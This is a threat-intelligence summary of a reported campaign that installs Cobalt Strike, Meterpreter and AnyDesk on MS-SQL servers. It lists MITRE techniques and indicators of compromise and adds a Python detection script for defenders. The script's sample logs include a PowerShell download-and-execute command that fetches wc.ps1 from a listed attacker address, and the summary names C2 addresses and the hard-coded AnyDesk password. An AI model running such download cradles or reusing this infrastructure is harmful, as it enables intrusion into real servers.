MS-SQL servers are commonly targeted by attackers who gain control and install malware, including coin miners and ransomware. The article details a case where attackers deploy Cobalt Strike and Meterpreter on vulnerable MS-SQL servers to install AnyDesk for remote control, with connections to groups like Kimsuky and Conti.
#CobaltStrike #Meterpreter #AnyDesk #Kimsuky #Conti
Keypoints
- Attackers target vulnerable MS-SQL servers and install malware after gaining control.
- Backdoors are often remote-control tools (Remcos RAT, Gh0st RAT), but infiltration tools like Cobalt Strike and Meterpreter are also used.
- The attack chain installs Cobalt Strike and Meterpreter on the MS-SQL server to gain deeper access and persistence.
- AnyDesk is then installed to enable remote control of the infected system, sometimes via silent installs with password settings.
- Meterpreter escalates privileges (Elevator DLL) and uses rundll32.exe to run further payloads, including PowerShell scripts to install AnyDesk.
- Defensive advice includes strong password hygiene, regular patching, and restricting external access to database servers via firewalls.
- Detected indicators include specific MD5 hashes (the Elevator DLL and the wc.ps1 script), the PowerShell download URL, and the Meterpreter C2 address linked to the operation.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Attackers scan vulnerable MS-SQL servers that are poorly managed and install malware upon gaining control. ‘MS-SQL servers are mainly the attack targets for Windows systems. Attackers scan vulnerable MS-SQL servers that are poorly managed and install malware upon gaining control.’
- [T1021] Remote Services – AnyDesk remote desktop features used to control the infected system. ‘AnyDesk is a remote control application that is similar to that of TeamViewer, providing various features such as remote desktop and sending files.’
- [T1059.001] PowerShell – Meterpreter uses PowerShell to install AnyDesk. ‘The powershell script “wc.ps1” installed by Meterpreter installs AnyDesk in silent mode from the application’s official webpage and sets AnyDesk’s password as “wocaoybb”.’
- [T1218.011] Signed Binary Proxy Execution: Rundll32 – Meterpreter operates in the rundll32.exe process to execute further actions. ‘After privilege escalation, Meterpreter operates in the rundll32.exe process and ultimately downloads and runs the powershell script that installs AnyDesk.’
- [T1068] Privilege Escalation – Elevator DLL used to escalate privileges after Meterpreter is initially executed. ‘Elevator DLL is a DLL used to escalate privilege with system permission after Meterpreter is initially executed.’
- [T1105] Ingress Tool Transfer – Meterpreter downloads and runs the powershell script to install AnyDesk. ‘ultimately downloads and runs the powershell script that installs AnyDesk.’
Indicators of Compromise
- [MD5] Elevator DLL and wc.ps1 – 5d3ae879e4bd09f824f48b49f4782e75, 0863ab6d606dea63b76eaa846ca9effd
- [URL] C2 / PowerShell delivery – http://3.101.101[.]56/wc.ps1, http://212.193.30[.]228:8080/a11
- [IP] Meterpreter C2 – 194.31.98[.]133:12443
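The following is an added detection example, not code from the ASEC article or from AhnLab. It takes the indicators listed above (kept defanged exactly as published), refangs them for matching, and runs both atomic IoC checks and behavioural rules for the described chain (sqlservr.exe spawning an interpreter, rundll32.exe launching PowerShell, the wc.ps1 script and its hard-coded AnyDesk password) over constructed Sysmon-style log lines. The log format, the field names, the file path used for the DLL and the behavioural heuristics are assumptions made for the example.

```python
# Hypothetical IoC and behaviour matcher for the MS-SQL -> Meterpreter -> AnyDesk chain.
# Added example; not part of the ASEC write-up. Log format and rules are assumptions.

# Indicators quoted in the write-up, kept defanged ("[.]") as published.
MD5_IOCS = {
    "5d3ae879e4bd09f824f48b49f4782e75",  # Elevator DLL
    "0863ab6d606dea63b76eaa846ca9effd",  # wc.ps1
}
URL_IOCS = {"http://3.101.101[.]56/wc.ps1", "http://212.193.30[.]228:8080/a11"}
IP_PORT_IOCS = {"194.31.98[.]133:12443"}  # Meterpreter C2


def refang(ioc):
    """Undo the '[.]' defanging so the value can be compared with raw log data."""
    return ioc.replace("[.]", ".")


def parse_event(line):
    """Parse a constructed 'Key=Value|Key=Value' line into a dict of Sysmon-like fields."""
    event = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            event[key.strip()] = value.strip()
    return event


def ioc_hits(event):
    """Atomic indicators: file hashes, download URLs and the C2 ip:port pair."""
    hits = []
    hashes = event.get("Hashes", "").lower()
    cmd = event.get("CommandLine", "")
    for h in MD5_IOCS:
        if h in hashes:
            hits.append("md5:" + h)
    for u in URL_IOCS:
        if refang(u) in cmd:
            hits.append("url:" + u)
    dest = event.get("DestinationIp", "") + ":" + event.get("DestinationPort", "")
    for ipp in IP_PORT_IOCS:
        if refang(ipp) == dest:
            hits.append("c2:" + ipp)
    return hits


def behaviour_hits(event):
    """Behavioural rules for the chain in the write-up (heuristics, not exact signatures)."""
    hits = []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "").lower()
    # Initial control: the SQL Server service itself spawning an interpreter or rundll32.
    if parent.endswith("sqlservr.exe") and image.endswith(("\\cmd.exe", "\\powershell.exe", "\\rundll32.exe")):
        hits.append("sqlservr spawned " + image.rsplit("\\", 1)[-1])
    # Meterpreter running inside rundll32.exe launching PowerShell (T1218.011 -> T1059.001).
    if parent.endswith("rundll32.exe") and image.endswith("powershell.exe"):
        hits.append("rundll32 launched powershell")
    # The AnyDesk installer script and the hard-coded password named in the write-up.
    if "wc.ps1" in cmd or "wocaoybb" in cmd:
        hits.append("wc.ps1 / known AnyDesk password in command line")
    # Unattended AnyDesk installation that sets a password (loose command-line heuristic).
    if "anydesk" in image and ("silent" in cmd or "password" in cmd):
        hits.append("silent AnyDesk install with password")
    return hits


def scan(lines):
    """Return (line_number, hits) for every line that triggers at least one rule."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        hits = ioc_hits(ev) + behaviour_hits(ev)
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample events (not from the article): one benign line, then four stages of the chain.
SAMPLE_LOGS = [
    r"EID=1|Image=C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe|ParentImage=C:\Windows\System32\services.exe|CommandLine=sqlservr.exe -sMSSQLSERVER",
    r"EID=1|Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe|CommandLine=cmd.exe /c whoami",
    r"EID=7|Image=C:\Windows\System32\rundll32.exe|ImageLoaded=C:\Users\Public\elevator.dll|Hashes=MD5=5D3AE879E4BD09F824F48B49F4782E75",
    r"EID=3|Image=C:\Windows\System32\rundll32.exe|DestinationIp=194.31.98.133|DestinationPort=12443",
    r"EID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\rundll32.exe|CommandLine=powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://3.101.101.56/wc.ps1')",
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOGS):
        print(n, hits)
```

The atomic matches are only as good as the published indicators, which attackers rotate; the behavioural rules (a database service process spawning cmd.exe or rundll32.exe, and rundll32.exe spawning PowerShell) are the part worth keeping in a SIEM, since they hold across re-hosted payloads and new C2 addresses.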
Read more: https://asec.ahnlab.com/en/36159/